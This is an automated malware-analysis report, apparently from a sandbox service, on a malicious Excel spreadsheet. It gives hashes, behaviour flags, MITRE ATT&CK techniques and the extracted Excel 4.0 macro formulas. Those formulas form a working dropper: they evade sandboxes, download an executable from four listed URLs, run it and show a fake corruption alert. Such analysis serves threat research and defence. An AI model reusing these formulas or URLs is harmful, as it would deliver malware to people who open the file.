Overview

overview

10

Static

static

10

89e6e635c1...4c.xls

windows7-x64

10

89e6e635c1...4c.xls

windows10-2004-x64

10

Resubmissions

28-12-2022 03:41

221228-d8w4gscd5x 10

09-04-2020 14:52

200409-4eb6rljnsx 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

  • Size

    111KB

  • Sample

    221228-d8w4gscd5x

  • MD5

    c7f273947124d844d77b7c376a9393b4

  • SHA1

    3497bea7fbb12fa3d62fce071fdb22ca53bfbddb

  • SHA256

    89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

  • SHA512

    b44a5e25276cb98cffa8a5d815d1802e817101cf028216761efb85f65610da2af1741f549fa7738985650dda8727bb7ccc1f36e5ac8baf2fc2ec004bf2c07b0d

  • SSDEEP

    3072:+0k3hbdlylKsgqopeJBWhZFGkE+cLax9M5QeSqA6JhzmuoVJEm9lKOXm:tk3hbdlylKsgqopeJBWhZFVE+Wax9MM9

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png

http://icietdemain.fr/contents/2020/02/idle/222222.png

http://careers.sorint.it/idle/33333.png

http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png
Attributes
  • formulas

    =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =GET.WORKSPACE(13) =GET.WORKSPACE(14) =IF(A2<770,CLOSE(FALSE),) =IF(A3<380,CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","c:\Users\Public\asd2asff32.exe",0,0) =IF(A7<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://icietdemain.fr/contents/2020/02/idle/222222.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(A12)) =IF(A8<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://careers.sorint.it/idle/33333.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(A12)) =IF(A9<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(A12)) =IF(A10<0,CLOSE(FALSE),) =EXEC("c:\Users\Public\asd2asff32.exe") =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2) =CLOSE(FALSE)

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png
xlm40.dropper

http://icietdemain.fr/contents/2020/02/idle/222222.png
xlm40.dropper

http://careers.sorint.it/idle/33333.png
xlm40.dropper

http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png

Targets

    • Target

      89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

    • Size

      111KB

    • MD5

      c7f273947124d844d77b7c376a9393b4

    • SHA1

      3497bea7fbb12fa3d62fce071fdb22ca53bfbddb

    • SHA256

      89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

    • SHA512

      b44a5e25276cb98cffa8a5d815d1802e817101cf028216761efb85f65610da2af1741f549fa7738985650dda8727bb7ccc1f36e5ac8baf2fc2ec004bf2c07b0d

    • SSDEEP

      3072:+0k3hbdlylKsgqopeJBWhZFGkE+cLax9M5QeSqA6JhzmuoVJEm9lKOXm:tk3hbdlylKsgqopeJBWhZFVE+Wax9MM9

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks